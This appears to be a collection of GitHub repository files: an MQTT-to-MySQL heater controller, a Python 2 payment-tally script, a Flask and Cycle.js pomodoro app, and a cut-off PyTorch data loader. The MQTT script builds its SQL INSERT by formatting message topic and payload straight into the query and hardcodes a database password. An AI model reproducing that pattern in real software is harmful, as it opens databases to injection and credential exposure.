"text": "import paho.mqtt.client as mqtt\r\nimport time\r\nimport datetime\r\nimport MySQLdb\r\n\r\n########## MySQL Setup ##########\r\n# Open database connection\r\ndb = MySQLdb.connect('localhost','mqtt','raspberry','temperature' )\r\n\r\n# prepare a cursor object using cursor() method\r\ncursor = db.cursor()\r\n\r\n########## MQTT Setup ##########\r\n# The callback for when the client receives a CONNACK response from the server.\r\ndef on_connect(client, userdata, flags, rc):\r\n print(\"Connected with result code \"+str(rc))\r\n\r\n # Subscribing in on_connect() means that if we lose the connection and\r\n # reconnect then subscriptions will be renewed.\r\n client.subscribe(\"sensor0\")\r\n client.subscribe(\"sensor1\")\r\n client.subscribe(\"sensor2\")\r\n client.subscribe(\"sensor3\")\r\n\r\nclient = mqtt.Client()\r\nclient.on_connect = on_connect\r\n\r\nclient.connect(\"192.168.0.200\", 1883, 60)\r\n\r\n# Start looping the MQTT network interface in the background\r\nclient.loop_start()\r\n\r\n########## Main Code ##########\r\n\r\n# The callback for when a PUBLISH message is received from the server.\r\ndef on_message(client, userdata, msg):\r\n\r\n #get the name of this topic, this tells us which sensor we are dealing with\r\n csensor = msg.topic\r\n #get the payload, this is the temperature the sensor is reporting minus 2 as the sensors report a little high\r\n ctemp = float(msg.payload)-2\r\n #get the zone by taking the last character of the message topic. (topics will be \"sensor0\", \"sensor1\", etc\r\n zone = list(csensor)[6]\r\n print(csensor+\" %f\" % ctemp)\r\n\r\n # Prepare SQL query to INSERT a record into the database.\r\n sql =\"INSERT INTO temps(date, time, zone, temperature) VALUES (CURRENT_DATE(), NOW(), '%s', '%f')\" % (csensor, ctemp)\r\n try:\r\n # Execute the SQL command\r\n cursor.execute(sql)\r\n # Commit changes to database\r\n db.commit()\r\n print(\"success\")\r\n except MySQLdb.Error, e:\r\n try:\r\n print \"MySQL Error [%d]: %s\" % (e.args[0], e.args[1])\r\n except IndexError:\r\n print \"MySQL Error: %s\" % str(e)\r\n # Rollback if error\r\n db.rollback()\r\n #switch on heater if temp in zone is less then 20\r\n if ctemp <= 24:\r\n client.publish(\"HEATER_FEED\", zone+\"1\", 1)\r\n else:\r\n client.publish(\"HEATER_FEED\", zone+\"0\", 1)\r\n\r\n\r\nclient.on_message = on_message\r\n\r\n\r\n# Main loop\r\nwhile True:\r\n # send temperature request\r\n client.publish(\"HEATER_FEED\", \"99\", 1)\r\n # wait for 15 minutes\r\n time.sleep(15*60)\r\n"
}
] | 2 |
adobs/homework_customers_who_overpaid
|
https://github.com/adobs/homework_customers_who_overpaid
|
eadcc12ad4637e7c2d9ca8673d57aea862b5c598
|
be818d8b636d95747f7b31db286c0699c5e1859b
|
e76d62cbb24cdba992d7219b3f47acadbeb6cc80
|
refs/heads/master
| 2021-01-10T14:51:10.026423 | 2015-09-25T02:35:46 | 2015-09-25T02:35:46 | 43,105,218 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6583054661750793,
"alphanum_fraction": 0.6627647876739502,
"avg_line_length": 33.403846740722656,
"blob_id": "02cafb624a3e17c2bdb9f66aace962e876b55b6e",
"content_id": "147d07b28e3fd7508195982ea51fde55c2ce25bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1794,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 52,
"path": "/accounting_edited.py",
"repo_name": "adobs/homework_customers_who_overpaid",
"src_encoding": "UTF-8",
"text": "def customer_payment_recorder(path):\n \"\"\"\n takes an order file and returns the amount overpaid and underpaid\n\n\n \"\"\"\n record_log = open(path)\n\n customers_underpaid = {}\n customers_overpaid = {}\n customers_paid = []\n\n for entry in record_log:\n entry = entry.rstrip()\n entry = entry.split(\"|\")\n\n customer_name = entry[1]\n qty_melons_ordered = int(entry[2])\n price_paid = float(entry[3])\n price_of_melon = 1.00\n\n\n #define customers who overpaid, and underpaid\n if qty_melons_ordered*price_of_melon < price_paid:\n customers_overpaid[customer_name] = price_paid - price_of_melon*qty_melons_ordered \n elif qty_melons_ordered*price_of_melon > price_paid:\n customers_underpaid[customer_name] = price_of_melon*qty_melons_ordered -price_paid \n else:\n customers_paid.append(customer_name)\n\n #calculate amount overpaid, and undepaid\n overpaid_amount = sum(customers_overpaid.itervalues())\n underpaid_amount = sum(customers_underpaid.itervalues())\n\n #calculated number of customers who overpaid, and underpaid\n number_of_customers_underpay = len(customers_underpaid)\n number_of_customers_overpay = len(customers_overpaid)\n number_of_customers_correct = len(customers_paid)\n\n print \"CUSTOMERS OVERPAID\"\n print \"{} customers underpaid by ${:+.2f}\".format(number_of_customers_underpay,underpaid_amount)\n print\n print \"CUSTOMERS UNDERPAID\"\n print \"{} customers overpay by ${:+.2f}\".format(number_of_customers_overpay, overpaid_amount)\n print\n print \"CUSTOMERS PAID CORRECTLY\"\n print \"{} customers correctly paid\".format(number_of_customers_correct)\n \n\n\n\ncustomer_payment_recorder(\"customer-orders.txt\")\n\n\n\n\n\n"
}
] | 1 |
popart/pomodoro
|
https://github.com/popart/pomodoro
|
ecf31b46b2af5ca231415708569ba1771bf47cd5
|
8d1e829fd4e8effc27415c8009c81c639178bae8
|
69b6ab9e7e0569def06018ba32e40b41f41d3805
|
refs/heads/master
| 2020-04-02T03:15:40.201592 | 2016-07-05T15:53:24 | 2016-07-05T15:53:24 | 62,464,685 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6342779994010925,
"alphanum_fraction": 0.6383265852928162,
"avg_line_length": 27.5,
"blob_id": "86cd6cd00823a6e1134a445c01121357c2fd69eb",
"content_id": "a4f1b81b24475ef66cbcb8eadf19e8e6a6d11763",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 26,
"path": "/scripts/setup_db.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "import sqlite3\n\ndef run(conn, query):\n c = conn.cursor()\n c.execute(query)\n conn.commit()\n\ndef create_todos(conn):\n run(conn, '''CREATE TABLE todos\n (id integer primary key, uuid text,\n date_created timestamp DEFAULT CURRENT_TIMESTAMP)''')\n\ndef create_todo_tasks(conn):\n run(conn, '''CREATE TABLE todo_tasks (\n id integer primary key, todo_id integer,\n text text, pomodoros integer DEFAULT 0,\n completed boolean DEFAULT false,\n date_created timestamp DEFAULT CURRENT_TIMESTAMP,\n FOREIGN KEY (todo_id) REFERENCES todos(id)\n )''')\n\nif __name__ == \"__main__\":\n conn = sqlite3.connect('db/pomodoro.db')\n create_todos(conn)\n create_todo_tasks(conn)\n conn.close()\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7008547186851501,
"avg_line_length": 23.63157844543457,
"blob_id": "852daebfb7a6e03f2dfe70988c1ea4a3a150fd7b",
"content_id": "750f00def45c345aca27c490e17b50b9b8f2b63e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 209,
"num_lines": 19,
"path": "/readme.md",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "# Pomodoro\nAn application to create todo lists and run a pomodoro timer. Uses [flask](http://flask.pocoo.org/), [cycle.js](http://cycle.js.org/), and [xstream](https://github.com/staltz/xstream). Written in Python & ES6.\n\n## Requirements\n * sqlite3\n * python3\n * python-virtualenv\n \n## Setup Instuctions\n ```bash\n npm install\n webpack\n\n virtualenv -p python3 venv\n source venv/bin/activate\n python scripts/setup_db.py\n pip install flask\n ./runserver\n ```\n"
},
{
"alpha_fraction": 0.4671781659126282,
"alphanum_fraction": 0.47058823704719543,
"avg_line_length": 24.478260040283203,
"blob_id": "ce897ec7cef18ff4b914ac67c6072606d448f27b",
"content_id": "7615565cde95c6077bee46ac6d63951eaa171586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1173,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 46,
"path": "/store/todo_store.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "class TodoStore:\n\n def __init__(self, db):\n self.__db = db\n\n def insert(self, uuid):\n query = \"\"\"\n INSERT INTO todos (uuid)\n VALUES (?)\n \"\"\"\n self.__db.run(query, [uuid])\n\n def select(self, **params):\n search_params = []\n where_clause = \"\"\n\n if 'id' in params:\n search_params.append(params['id'])\n where_clause = where_clause + \"AND id = ?\"\n\n if 'uuid' in params:\n search_params.append(params['uuid'])\n where_clause = where_clause + \"AND uuid = ?\"\n\n if 'limit' in params: search_params.append(params['limit'])\n else:\n search_params.append(10)\n\n query = \"\"\"\n SELECT id, uuid, date_created FROM todos\n WHERE 1=1\n %s\n LIMIT ?\n \"\"\" % where_clause\n\n results = self.__db.fetch(query, search_params)\n\n def parse_result(result):\n id, uuid, date_created = result\n return {\n 'id': id,\n 'uuid': uuid,\n 'date_created': date_created\n }\n\n return map(parse_result, results)\n\n"
},
{
"alpha_fraction": 0.5438202023506165,
"alphanum_fraction": 0.550561785697937,
"avg_line_length": 22.421052932739258,
"blob_id": "5d2c3bb1c148fe1c7b5c741e5268dcbd0c577bad",
"content_id": "1cf7ef5e2dafbb2f53c23a16900a9ccae4568d9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 19,
"path": "/store/sqliteconn.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "import sqlite3\n\nclass SQLite3Conn:\n\n def __init__(self, db_loc):\n self.__conn = sqlite3.connect(db_loc)\n\n def run(self, query, params):\n c = self.__conn.cursor()\n c.execute(query, params)\n self.__conn.commit()\n\n def fetch(self, query, params):\n c = self.__conn.cursor()\n return c.execute(query, params).fetchall()\n\n def __del__(self):\n if self.__conn:\n self.__conn.close()\n"
},
{
"alpha_fraction": 0.6410014033317566,
"alphanum_fraction": 0.6461974382400513,
"avg_line_length": 28.40277862548828,
"blob_id": "7ea1a9345b4ac0f89f32f9dec3e4630e1718d748",
"content_id": "aac15d89bad04f9be8c6a3e54416daaf6dba4de2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2117,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 72,
"path": "/main.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "from flask import Flask, jsonify, redirect, url_for, request\nimport json\nfrom uuid import uuid4\nfrom store.sqliteconn import SQLite3Conn\nfrom store.todo_store import TodoStore\nfrom store.task_store import TaskStore\n\napp = Flask(__name__)\ndb = SQLite3Conn('db/pomodoro.db')\n\nstores = {\n 'todos': TodoStore(db),\n 'tasks': TaskStore(db)\n}\n\[email protected]('/')\[email protected]('/todo')\ndef landing():\n return app.send_static_file('index.html')\n\[email protected]('/api/todo/<uuid:uuid>')\ndef get_todo(uuid):\n todo = stores['todos'].select(uuid=str(uuid), limit=1)\n return jsonify({'resp': next(todo) })\n\[email protected]('/api/todo/new')\ndef create_todo():\n uuid = str(uuid4())\n stores['todos'].insert(uuid)\n return jsonify({'resp': uuid})\n\[email protected]('/api/todo/<uuid:uuid>/tasks')\ndef get_tasks(uuid):\n tasks = list(stores['tasks'].select(todo_uuid=str(uuid)))\n return jsonify({'resp': tasks})\n\[email protected]('/api/todo/<uuid:uuid>/tasks/new', methods=['POST'])\ndef create_task(uuid):\n data = json.loads(request.data.decode('utf-8'))\n todo = next(stores['todos'].select(\n uuid=str(uuid), limit=1))\n\n stores['tasks'].insert(data['text'], todo['id'])\n\n tasks = list(stores['tasks'].select(todo_id=todo['id']));\n return jsonify({ 'resp': tasks })\n\[email protected]('/api/todo/<uuid:uuid>/tasks/<task_id>/update', methods=['POST'])\ndef update_task(uuid, task_id):\n data = json.loads(request.data.decode('utf-8'))\n todo = next(stores['todos'].select(\n uuid=str(uuid), limit=1))\n\n stores['tasks'].update(task_id=task_id, **data)\n\n tasks = list(stores['tasks'].select(todo_id=todo['id']));\n return jsonify({ 'resp': tasks })\n\[email protected]('/api/tasks/<task_id>/addPomodoro')\ndef add_pomodoro(task_id):\n task = next(stores['tasks'].select(id=task_id))\n todo = next(stores['todos'].select(\n id=task['todo_id'], limit=1))\n\n stores['tasks'].update(task_id=task_id, add_pomodoros=1)\n\n tasks = list(stores['tasks'].select(todo_id=todo['id']));\n return jsonify({ 'resp': tasks })\n\[email protected]('/<path:path>')\ndef static_proxy(path):\n return app.send_static_file(path)\n"
},
{
"alpha_fraction": 0.7377777695655823,
"alphanum_fraction": 0.7644444704055786,
"avg_line_length": 19.454545974731445,
"blob_id": "a1df6b460588c0dec587498d07521687f445c54d",
"content_id": "ff51dc57a0636ba2efbe33504d5ab7f52a9b3346",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 11,
"path": "/docker/Dockerfile",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "FROM pritunl/archlinux\n\nRUN pacman -S --noconfirm python3\nRUN pacman -S --noconfirm python-pip\nRUN pacman -S --noconfirm npm\nRUN pacman -S --noconfirm sqlite3\nRUN pacman -S --noconfirm vim\n\nRUN pip install flask\n\nEXPOSE 5000\n"
},
{
"alpha_fraction": 0.578199028968811,
"alphanum_fraction": 0.5906936526298523,
"avg_line_length": 24.505495071411133,
"blob_id": "bd7d339cff4e9d264f4737584202f6b646861815",
"content_id": "c3c1512f1ec47482f085ad85aa0849116f273113",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2321,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 91,
"path": "/static/src/components/timer.js",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "import xs from 'xstream';\nimport {div, h1, button, input} from '@cycle/dom';\n\nconst freeze = Object.freeze;\n\nclass TimerProps {\n constructor(startTime, time, paused) {\n this.startTime = startTime;\n this.time = time;\n this.paused = paused;\n }\n}\n\nconst timerPropsInit = freeze(new TimerProps(25 * 60, 25 * 60, false));\n\nfunction updateTimer(timerProps, timerEvent) {\n switch (timerEvent.caseClass) {\n case \"SET\":\n return freeze(new TimerProps(timerEvent.time,\n timerEvent.time, true));\n case \"RESET\":\n return freeze(new TimerProps(timerProps.startTime,\n timerProps.startTime, timerProps.paused));\n case \"TICK\":\n return freeze(new TimerProps(timerProps.startTime,\n timerProps.paused ?\n timerProps.time :\n Math.max(-1, timerProps.time - 1),\n timerProps.paused));\n case \"PAUSE\":\n return freeze(new TimerProps(timerProps.startTime,\n timerProps.time, !timerProps.paused));\n default:\n return timerProps;\n }\n}\n\nexport default function Timer(sources) {\n //intent\n const setTime$ = sources.DOM.select('#startTime').events('input')\n .map (ev => ({\n caseClass: \"SET\",\n time: Math.floor(ev.target.value * 60)\n }));\n\n const reset$ = sources.DOM.select('#reset').events('click')\n .mapTo({\n caseClass: \"RESET\"\n });\n\n const pause$ = sources.DOM.select('#pause').events('click')\n .mapTo({\n caseClass: \"PAUSE\"\n });\n\n const tick$ = xs.merge(reset$, setTime$, pause$).startWith(1)\n .map( () =>\n xs.periodic(1000)\n .mapTo( {\n caseClass: \"TICK\"\n })\n )\n .flatten();\n\n // model\n const timer$ = xs.merge(setTime$, reset$, pause$, tick$)\n .fold(updateTimer, timerPropsInit);\n\n // view\n const timerDOM$ = timer$.map(timerProps => {\n const time = Math.max(timerProps.time, 0)\n const minutes = Math.floor(time / 60);\n const seconds = ('00' + (time % 60)).slice(-2);\n return div([\n h1('#time', minutes + ':' + seconds),\n button('#reset', 'Reset'),\n button('#pause', timerProps.paused ? 'Start' : 'Pause'),\n input('#startTime', {\n attrs: {\n type: 'text',\n value: Math.floor(timerProps.startTime / 60)\n }\n })\n ])\n });\n\n return {\n DOM: timerDOM$,\n timerProps: timer$\n }\n}\n"
},
{
"alpha_fraction": 0.4925970435142517,
"alphanum_fraction": 0.4933973550796509,
"avg_line_length": 29.839506149291992,
"blob_id": "9cbd5298995a856acfca56d722ce5190ad687e4c",
"content_id": "196f9827c8dcef0c926476af1a0a1e6430d70012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2499,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 81,
"path": "/store/task_store.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "class TaskStore:\n\n def __init__(self, db):\n self.__db = db\n\n def insert(self, text, todo_id):\n query = \"\"\"\n INSERT INTO todo_tasks (text, todo_id)\n VALUES (?, ?)\n \"\"\"\n self.__db.run(query, [text, todo_id])\n\n def select(self, **params):\n search_params = []\n join_clause = \"\"\n where_clause = \"\"\n limit_clause = \"\"\n\n if 'todo_id' in params:\n search_params.append(params['todo_id'])\n where_clause = where_clause + \"AND tt.todo_id = ?\\n\"\n\n if 'todo_uuid' in params:\n search_params.append(params['todo_uuid'])\n join_clause = join_clause + \"JOIN todos t ON t.id = tt.todo_id\\n\"\n where_clause = where_clause + \"AND t.uuid = ?\\n\"\n\n if 'id' in params:\n search_params.append(params['id'])\n where_clause = where_clause + \"AND tt.id = ?\\n\"\n\n if 'limit' in params:\n limit_clause = \"LIMIT ?\\n\"\n search_params.append(params['limit'])\n\n query = \"\"\"\n SELECT tt.id, tt.todo_id, tt.text, tt.pomodoros, tt.completed,\n tt.date_created\n FROM todo_tasks tt\n %s\n WHERE 1=1\n %s\n %s\n ORDER BY tt.date_created\n \"\"\" % (join_clause, where_clause, limit_clause)\n\n def parse_result(result):\n id, todo_id, text, pomodoros, completed, date_created = result\n return {\n 'id': id,\n 'todo_id': todo_id,\n 'text': text,\n 'pomodoros': pomodoros,\n 'completed': True if completed == 'true' else False,\n 'date_created': date_created\n }\n\n results = self.__db.fetch(query, search_params)\n return map(parse_result, results)\n\n def update(self, **params):\n update_clause = \"\"\n search_params = []\n\n if 'completed' in params:\n update_clause = update_clause + \"completed = ?\\n\"\n search_params.append(str(params['completed']).lower())\n if 'add_pomodoros' in params:\n update_clause = update_clause + \"pomodoros = pomodoros + ?\\n\"\n search_params.append(params['add_pomodoros'])\n\n search_params.append(params['task_id'])\n\n query = \"\"\"\n UPDATE todo_tasks SET\n %s\n WHERE\n ID = ?\n \"\"\" % update_clause\n\n self.__db.run(query, search_params)\n\n"
}
] | 8 |
Charlie-23/Titanic
|
https://github.com/Charlie-23/Titanic
|
8adcc21d3e837039fe60da57e1f4b822db457a87
|
a813c1a4b657a93ca1d4e788ad6080fc289354a4
|
7f60ac613d9009caceb0b59b76378f29ff46f63b
|
refs/heads/master
| 2020-05-26T22:03:00.666108 | 2019-05-25T19:22:36 | 2019-05-25T19:22:36 | 188,391,439 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6239978671073914,
"alphanum_fraction": 0.6488508582115173,
"avg_line_length": 23.20270347595215,
"blob_id": "e330198fdfd889112da4609626fd415f1ff2409a",
"content_id": "512489c4d821925ab1f31b68b873ece247a3bb18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3742,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 148,
"path": "/SOLUTION.py",
"repo_name": "Charlie-23/Titanic",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 25 18:35:54 2019\r\n\r\n@author: Prakash\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\n# Importing the dataset_traain_set\r\ndataset_t = pd.read_csv('test.csv')\r\ndataset_t.drop([\"PassengerId\",\"Name\",\"Ticket\",\"Cabin\"],axis = 1,inplace = True)\r\n\r\n#imputing missing values_train\r\ndataset_t.info()\r\n\r\ndataset_t.iloc[152,5]=dataset_t.iloc[:,5].mean()\r\nfare_t = dataset_t.iloc[:, [0,5]].values\r\nage_t = dataset_t.iloc[:, 2].values\r\n\r\nfare_test_t = []\r\nindices_t=[]\r\nfor i_t in range(0,len(age_t)):\r\n if (np.isnan(age_t[i_t])):\r\n fare_test_t.append(fare_t[i_t])\r\n indices_t.append(i_t)\r\n \r\n else:\r\n continue\r\n \r\nfare_t = np.delete(fare_t,indices_t,axis = 0) \r\nage_t = np.delete(age_t,indices_t,axis = None) \r\n\r\n\r\nfare_test_t = np.array(fare_test_t)\r\nfare_test_t = fare_test_t.reshape(-1,2)\r\n\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor_t = LinearRegression()\r\nregressor_t.fit(fare_t,age_t)\r\n\r\nage_pred_t = regressor_t.predict(fare_test_t)\r\nj=0\r\nfor i in range(0,418):\r\n if (np.isnan(dataset_t.iloc[i,2])):\r\n dataset_t.iloc[i,2]=age_pred_t[j]\r\n j=j+1\r\n#Dropping unnecessary features \r\n#Final_data_to_train_system\r\ndataset_t.info()\r\nI_t= dataset_t.iloc[:,[0,1,2,3,4,5,6]].values\r\n#categorical_feature_processing_train\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_I_t = LabelEncoder()\r\nI_t[:, 1] = labelencoder_I_t.fit_transform(I_t[:, 1])\r\n\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_I_t1 = LabelEncoder()\r\nI_t[:, 6] = labelencoder_I_t1.fit_transform(I_t[:, 6])\r\nonehotencoder = OneHotEncoder(categorical_features = [1,6])\r\nI_t = onehotencoder.fit_transform(I_t).toarray()\r\n\r\n\r\n\r\n# Importing the dataset_train_set\r\ndataset = pd.read_csv('train.csv')\r\n\r\n#Dropping unnecessary features \r\ndataset.drop([\"PassengerId\",\"Name\",\"Ticket\",\"Cabin\"],axis = 1,inplace = True)\r\ncommon_value = 'S'\r\ndataset['Embarked'] = dataset['Embarked'].fillna(common_value)\r\n\r\n#imputing missing values_train\r\nfare = dataset.iloc[:, [1,6]].values\r\nage = dataset.iloc[:, 3].values\r\nfare_test = []\r\nindices=[]\r\nfor i in range(0,len(age)):\r\n if (np.isnan(age[i])):\r\n fare_test.append(fare[i])\r\n indices.append(i)\r\n \r\n else:\r\n continue\r\n \r\nfare = np.delete(fare,indices,axis = 0) \r\nage = np.delete(age,indices,axis = None) \r\n\r\nfare_test = np.array(fare_test)\r\nfare_test = fare_test.reshape(-1,2)\r\n\r\n\r\n \r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(fare, age)\r\n\r\nage_pred = regressor.predict(fare_test)\r\nj=0\r\nfor i in range(0,891):\r\n if (np.isnan(dataset.iloc[i,3])):\r\n dataset.iloc[i,3]=age_pred[j]\r\n j=j+1\r\n \r\n else:\r\n continue\r\n\r\n\r\ndataset.info()\r\n#Final_data_to_train_system\r\nO= dataset.iloc[:,0].values\r\nI= dataset.iloc[:,[1,2,3,4,5,6,7]].values\r\n#categorical_feature_processing_train\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_I = LabelEncoder()\r\nI[:, 1] = labelencoder_I.fit_transform(I[:, 1])\r\n\r\nlabelencoder_I1 = LabelEncoder()\r\nI[:, 6] = labelencoder_I1.fit_transform(I[:, 6])\r\n\r\nonehotencoder = OneHotEncoder(categorical_features = [1,6])\r\nI = onehotencoder.fit_transform(I).toarray()\r\n\r\n\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrandom_forest = RandomForestClassifier(n_estimators=100)\r\nrandom_forest.fit(I,O)\r\n\r\nY_predictiont1 = random_forest.predict(I_t)\r\ndataset_1t = pd.read_csv('test.csv')\r\nx=dataset_1t.iloc[:,0]\r\n\r\ndf = pd.DataFrame(x)\r\nl=[]\r\nfor i in range(0,418):\r\n l.append(Y_predictiont1[i])\r\n \r\ndf['Survived']=l\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 1 |
NikV/my-first-python
|
https://github.com/NikV/my-first-python
|
c8d85eb8e997b680775a1f22fc0acbf9eabd70f6
|
3d75fc4c1b837ed090121dc94b4162ee075060de
|
76a635ae51c7b81b1df02eeda7741f336bf3a299
|
refs/heads/master
| 2021-03-19T07:09:23.082224 | 2015-04-22T03:19:49 | 2015-04-22T03:19:49 | 34,068,164 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6508620977401733,
"alphanum_fraction": 0.681034505367279,
"avg_line_length": 21,
"blob_id": "9ba486978ce724a458b660c9fb820d82172bd269",
"content_id": "06c9567b3945f46c60a8572e6805c2ffb13cf775",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 464,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 21,
"path": "/cool.py",
"repo_name": "NikV/my-first-python",
"src_encoding": "UTF-8",
"text": "import platform\nimport calendar\nimport time;\n\n\nraw_input(\"\\n\\nPress the enter key to continue.\")\nprint platform.machine()\nprint platform.version()\nticks = time.time()\nprint \"Number of ticks since 12:00am, January 1, 1970:\", ticks\ncal = calandar.month(2015, 1)\nprint cal;\n\nstr = raw_input(\"Are you cool? \");\n\nwords = str.split() #split the sentence into individual words\n\nif str in ['y', 'Y', 'yes', 'Yes', 'YES']:\n print(\"Cool!\")\nelse:\n print(\"TROLOLOLO\")\n\n\n"
},
{
"alpha_fraction": 0.7631579041481018,
"alphanum_fraction": 0.7631579041481018,
"avg_line_length": 56,
"blob_id": "cb28818994759842234425fc2e38059831b57427",
"content_id": "a63ab5f705b83a85367280f9f407b28570275700",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 2,
"path": "/README.md",
"repo_name": "NikV/my-first-python",
"src_encoding": "UTF-8",
"text": "# My First Python\nWriting my first simple Python script. Probably have a lot more coming in the future...maybe...\n"
}
] | 2 |
stronglily/lhy
|
https://github.com/stronglily/lhy
|
f60b31edbea034f6b75da97008eee85bc547860a
|
4e9dcfd4bc023c580db3addfe1a744a5fa32e02e
|
c0e5e1c78751949316f0c3847bc14a2d5a264286
|
refs/heads/master
| 2022-11-18T20:48:13.785673 | 2020-07-08T05:35:39 | 2020-07-08T05:35:39 | 231,697,458 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 9,
"blob_id": "6e558691a56c95f0a2bf1f83454529b20572d7b8",
"content_id": "a529c108f141d319f879d477d80a27b743df8b6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 3,
"path": "/README.md",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# helloworld\njust me\nonly you\n"
},
{
"alpha_fraction": 0.5261984467506409,
"alphanum_fraction": 0.5362318754196167,
"avg_line_length": 35.90140914916992,
"blob_id": "d1c92a2e24833629052c9bdff8ead4b05e51546a",
"content_id": "fb0db8565cccde3ce7bdb9601a79672db66a5699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2827,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 71,
"path": "/hw14_life_long_learning/data.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import os\r\nfrom torch.utils import data\r\nfrom torch.utils.data import sampler\r\nfrom torchvision import datasets\r\nfrom hw14_life_long_learning.preprocess import get_transform\r\n\r\n\r\n# 準備 資料集\r\n# MNIST : 一張圖片資料大小: 28∗28∗1 , 灰階 , 10 個種類\r\n# SVHN : 一張圖片資料大小: 32∗32∗3 , RGB , 10 個種類\r\n# USPS : 一張圖片資料大小: 16∗16∗1 , 灰階 , 10 個種類\r\nclass Data():\r\n def __init__(self, path):\r\n transform = get_transform()\r\n\r\n self.MNIST_dataset = datasets.MNIST(root=os.path.join(path, \"MNIST\"),\r\n transform=transform,\r\n train=True,\r\n download=True)\r\n\r\n self.SVHN_dataset = datasets.SVHN(root=os.path.join(path, \"SVHN\"),\r\n transform=transform,\r\n split='train',\r\n download=True)\r\n\r\n self.USPS_dataset = datasets.USPS(root=os.path.join(path, \"USPS\"),\r\n transform=transform,\r\n train=True,\r\n download=True)\r\n\r\n def get_datasets(self):\r\n a = [(self.SVHN_dataset, \"SVHN\"), (self.MNIST_dataset, \"MNIST\"), (self.USPS_dataset, \"USPS\")]\r\n return a\r\n\r\n\r\n# 建立 Dataloader\r\n# *.train_loader: 拿取訓練集並訓練 \\\r\n# *.val_loader: 拿取驗證集並驗測結果 \\\r\nclass Dataloader():\r\n\r\n def __init__(self, dataset, batch_size, split_ratio=0.1):\r\n self.dataset = dataset[0]\r\n self.name = dataset[1]\r\n train_sampler, val_sampler = self.split_dataset(split_ratio)\r\n\r\n self.train_dataset_size = len(train_sampler)\r\n self.val_dataset_size = len(val_sampler)\r\n\r\n self.train_loader = data.DataLoader(self.dataset, batch_size=batch_size, sampler=train_sampler)\r\n self.val_loader = data.DataLoader(self.dataset, batch_size=batch_size, sampler=val_sampler)\r\n self.train_iter = self.infinite_iter()\r\n\r\n def split_dataset(self, split_ratio):\r\n data_size = len(self.dataset)\r\n split = int(data_size * split_ratio)\r\n indices = list(range(data_size))\r\n np.random.shuffle(indices)\r\n train_idx, valid_idx = indices[split:], indices[:split]\r\n\r\n train_sampler = sampler.SubsetRandomSampler(train_idx)\r\n val_sampler = sampler.SubsetRandomSampler(valid_idx)\r\n return train_sampler, val_sampler\r\n\r\n def infinite_iter(self):\r\n it = iter(self.train_loader)\r\n while True:\r\n try:\r\n ret = next(it)\r\n yield ret\r\n except 